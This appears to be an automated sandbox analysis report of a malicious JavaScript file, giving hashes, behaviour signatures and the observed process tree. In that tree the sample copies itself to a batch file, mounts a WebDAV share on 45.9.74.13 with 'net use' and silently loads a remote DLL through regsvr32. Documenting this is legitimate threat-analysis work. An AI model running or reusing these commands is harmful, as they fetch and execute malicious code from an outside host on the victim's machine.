Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 00:56
Static task
static1
Behavioral task
behavioral1
Sample
7989242762876926607.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
7989242762876926607.js
Resource
win10v2004-20240704-en
General
-
Target
7989242762876926607.js
-
Size
5KB
-
MD5
c1884f56cb4dbae6f7c395f20b582fda
-
SHA1
c3ad7c116c56c68f39362f5dd37f021497bef6be
-
SHA256
d8ab4102f62ed6debdc1c9f9e5a6733b6f08bc065ac6ccc0cdc152c93b81f24e
-
SHA512
8c048b3336d03367517fea722b8461783547af0a39fb279d7e29a39dc1e767b8ecc6a24335d8bc3810f7774c667548032c1bd07470e85c41352daaa37c941fb1
-
SSDEEP
96:Vfh2Xh6NTy4gzk4ggYmi1leUIFNM/d9IjzuCGUfL9UkY:VYxx3kMDi1QZFNWdSjzuC9L9UkY
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2620 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2216 2232 wscript.exe 28 PID 2232 wrote to memory of 2216 2232 wscript.exe 28 PID 2232 wrote to memory of 2216 2232 wscript.exe 28 PID 2216 wrote to memory of 2660 2216 cmd.exe 30 PID 2216 wrote to memory of 2660 2216 cmd.exe 30 PID 2216 wrote to memory of 2660 2216 cmd.exe 30 PID 2216 wrote to memory of 2620 2216 cmd.exe 31 PID 2216 wrote to memory of 2620 2216 cmd.exe 31 PID 2216 wrote to memory of 2620 2216 cmd.exe 31 PID 2216 wrote to memory of 2620 2216 cmd.exe 31 PID 2216 wrote to memory of 2620 2216 cmd.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7989242762876926607.js1⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\7989242762876926607.js" "C:\Users\Admin\\rgggul.bat" && "C:\Users\Admin\\rgggul.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2660
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\502.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2620
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5c1884f56cb4dbae6f7c395f20b582fda
SHA1c3ad7c116c56c68f39362f5dd37f021497bef6be
SHA256d8ab4102f62ed6debdc1c9f9e5a6733b6f08bc065ac6ccc0cdc152c93b81f24e
SHA5128c048b3336d03367517fea722b8461783547af0a39fb279d7e29a39dc1e767b8ecc6a24335d8bc3810f7774c667548032c1bd07470e85c41352daaa37c941fb1